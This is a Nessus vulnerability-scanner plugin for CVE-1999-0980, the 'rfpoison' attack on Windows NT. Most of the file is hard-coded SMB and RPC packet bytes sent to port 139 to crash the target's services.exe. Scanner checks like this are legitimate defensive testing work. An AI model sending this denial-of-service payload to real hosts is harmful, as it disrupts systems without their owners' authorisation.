Microsoft Windows NT SCM Malformed Resource Enumeration Request DoS

#
# (C) Tenable Network Security, Inc.
#

include('compat.inc');

if (description)
{
 script_id(10204);
 script_version("1.31");
 script_set_attribute(attribute:"plugin_modification_date", value:"2022/12/07");

 script_cve_id("CVE-1999-0980");
 script_bugtraq_id(754);

 script_name(english:"Microsoft Windows NT SCM Malformed Resource Enumeration Request DoS");
 script_summary(english:"Crashes the remote host using the 'rfpoison' attack");

 script_set_attribute(attribute:"synopsis", value:"The remote host is vulnerable to a denial of service.");
 script_set_attribute(attribute:"description", value:
"An 'rfpoison' packet has been sent to the remote host. This packet is
supposed to crash the 'services.exe' process, making the system
unstable.");
#https://docs.microsoft.com/en-us/security-updates/securitybulletins/1999/ms99-055
 script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?b921cc98");
 script_set_attribute(attribute:"solution", value:
"Apply NT4 last service pack, or better, upgrade to Windows last
version.");
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
 script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
 script_set_attribute(attribute:"exploit_available", value:"true");
 script_set_attribute(attribute:"cvss_score_source", value:"CVE-1999-0980");

 script_set_attribute(attribute:"vuln_publication_date", value:"1999/10/31");
 script_set_attribute(attribute:"plugin_publication_date", value:"1999/11/01");

 script_set_attribute(attribute:"potential_vulnerability", value:"true");
 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_end_attributes();

 script_category(ACT_DENIAL);
 script_copyright(english:"This script is Copyright (C) 1999-2022 Tenable Network Security, Inc.");
 script_family(english:"Windows");

 script_require_keys("Settings/ParanoidReport");
 script_require_ports(139);

 exit(0);
}

if (report_paranoia < 2) audit(AUDIT_PARANOID);

version = get_kb_item("SMB/WindowsVersion");
if( version )
{
 if(preg(pattern:"[5-9]\.", string:version))exit(0);
}


if(get_port_state(139))
{
 soc = open_sock_tcp(139);
 if(soc)
 {

#
# This is the result of rfp's secret program. I don't pretend
# I understand it, but it works.
#

data = raw_string(0x81,0x0,0x0,0x48,0x20,0x43,0x4b,0x46,0x44,0x45,0x4e,0x45,0x43,0x46,0x44,0x45,0x46,0x46,0x43,0x46,0x47,0x45,0x46,0x46,0x43,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x0,0x20,0x45,0x48,0x45,0x42,0x46,0x45,0x45,0x46,0x45,0x4c,0x45,0x46,0x45,0x46,0x46,0x41,0x45,0x46,0x46,0x43,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x41,0x41,0x0,0x0,0x0,0x0,0x0);

send(socket:soc, data:data);
recv(socket:soc, length:1024);

data = raw_string(0x0,0x0,0x0,0xa4,0xff,0x53,0x4d,0x42,0x72,0x0,0x0,0x0,0x0,0x8,0x1,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0xf4,0x1,0x0,0x0,0x1,0x0,0x0,0x81,0x0,0x2,0x50,0x43,0x20,0x4e,0x45,0x54,0x57,0x4f,0x52,0x4b,0x20,0x50,0x52,0x4f,0x47,0x52,0x41,0x4d,0x20,0x31,0x2e,0x30,0x0,0x2,0x4d,0x49,0x43,0x52,0x4f,0x53,0x4f,0x46,0x54,0x20,0x4e,0x45,0x54,0x57,0x4f,0x52,0x4b,0x53,0x20,0x31,0x2e,0x30,0x33,0x0,0x2,0x4d,0x49,0x43,0x52,0x4f,0x53,0x4f,0x46,0x54,0x20,0x4e,0x45,0x54,0x57,0x4f,0x52,0x4b,0x53,0x20,0x33,0x2e,0x30,0x0,0x2,0x4c,0x41,0x4e,0x4d,0x41,0x4e,0x31,0x2e,0x30,0x0,0x2,0x4c,0x4d,0x31,0x2e,0x32,0x58,0x30,0x30,0x32,0x0,0x2,0x53,0x61,0x6d,0x62,0x61,0x0,0x2,0x4e,0x54,0x20,0x4c,0x41,0x4e,0x4d,0x41,0x4e,0x20,0x31,0x2e,0x30,0x0,0x2,0x4e,0x54,0x20,0x4c,0x4d,0x20,0x30,0x2e,0x31,0x32,0x0);

send(socket:soc, data:data);
recv(socket:soc, length:1024);

data = raw_string(0x0,0x0,0x0,0x54,0xff,0x53,0x4d,0x42,0x73,0x0,0x0,0x0,0x0,0x8,0x1,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0xf4,0x1,0x0,0x0,0x1,0x0,0xd,0xff,0x0,0x0,0x0,0xff,0xff,0x2,0x0,0xf4,0x1,0x0,0x0,0x0,0x0,0x1,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x17,0x0,0x0,0x0,0x57,0x4f,0x52,0x4b,0x47,0x52,0x4f,0x55,0x50,0x0,0x55,0x6e,0x69,0x78,0x0,0x53,0x61,0x6d,0x62,0x61,0x0);

send(socket:soc, data:data);
recv(socket:soc, length:1024);

data = raw_string(0x0,0x0,0x0,0x42,0xff,0x53,0x4d,0x42,0x75,0x0,0x0,0x0,0x0,0x8,0x1,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0xf4,0x1,0x0,0x8,0x1,0x0,0x4,0xff,0x0,0x0,0x0,0x0,0x0,0x1,0x0,0x17,0x0,0x0,0x5c,0x5c,0x2a,0x53,0x4d,0x42,0x53,0x45,0x52,0x56,0x45,0x52,0x5c,0x49,0x50,0x43,0x24,0x0,0x49,0x50,0x43,0x0);

send(socket:soc, data:data);
recv(socket:soc, length:1024);

data = raw_string(0x0,0x0,0x0,0x5b,0xff,0x53,0x4d,0x42,0xa2,0x0,0x0,0x0,0x0,0x8,0x1,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x8,0xf4,0x1,0x0,0x8,0x1,0x0,0x18,0xff,0x0,0x0,0x0,0x0,0x7,0x0,0x6,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x9f,0x1,0x2,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x3,0x0,0x0,0x0,0x1,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0x0,0x8,0x0,0x5c,0x73,0x72,0x76,0x73,0x76,0x63,0x0);

send(socket:soc, data:data);
recv(socket:soc, length:1024);

data = raw_string(0x0,0x0,0x0,0x94,0xff,0x53,0x4d,0x42,0x25,0x0,0x0,0x0,0x0,0x8,0x1,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x8,0xf4,0x1,0x0,0x8,0x1,0x0,0x10,0x0,0x0,0x48,0x0,0x0,0x0,0x48,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x4c,0x0,0x48,0x0,0x4c,0x0,0x2,0x0,0x26,0x0,0x0,0x8,0x51,0x0,0x5c,0x50,0x49,0x50,0x45,0x5c,0x0,0x0,0x0,0x5,0x0,0xb,0x0,0x10,0x0,0x0,0x0,0x48,0x0,0x0,0x0,0x1,0x0,0x0,0x0,0x30,0x16,0x30,0x16,0x0,0x0,0x0,0x0,0x1,0x0,0x0,0x0,0x0,0x0,0x1,0x0,0xc8,0x4f,0x32,0x4b,0x70,0x16,0xd3,0x1,0x12,0x78,0x5a,0x47,0xbf,0x6e,0xe1,0x88,0x3,0x0,0x0,0x0,0x4,0x5d,0x88,0x8a,0xeb,0x1c,0xc9,0x11,0x9f,0xe8,0x8,0x0,0x2b,0x10,0x48,0x60,0x2,0x0,0x0,0x0);

send(socket:soc, data:data);
recv(socket:soc, length:1024);

data = raw_string(0x0,0x0,0x0,0xa4,0xff,0x53,0x4d,0x42,0x25,0x0,0x0,0x0,0x0,0x8,0x1,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x8,0xf4,0x1,0x0,0x8,0x1,0x0,0x10,0x0,0x0,0x58,0x0,0x0,0x0,0x58,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x4c,0x0,0x58,0x0,0x4c,0x0,0x2,0x0,0x26,0x0,0x0,0x8,0x61,0x0,0x5c,0x50,0x49,0x50,0x45,0x5c,0x0,0x0,0x0,0x5,0x0,0x0,0x3,0x10,0x0,0x0,0x0,0x58,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0x48,0x0,0x0,0x0,0x0,0x0,0xf,0x0,0x1,0x0,0x0,0x0,0xd,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0xd,0x0,0x0,0x0,0x5c,0x0,0x5c,0x0,0x2a,0x0,0x53,0x0,0x4d,0x0,0x42,0x0,0x53,0x0,0x45,0x0,0x52,0x0,0x56,0x0,0x45,0x0,0x52,0x0,0x0,0x0,0x0,0x0,0x1,0x0,0x0,0x0,0x1,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0xff,0xff,0xff,0xff,0x0,0x0,0x0,0x0);

send(socket:soc, data:data);
recv(socket:soc, length:1024);

security_warning(port:139);
close(soc);
 }
}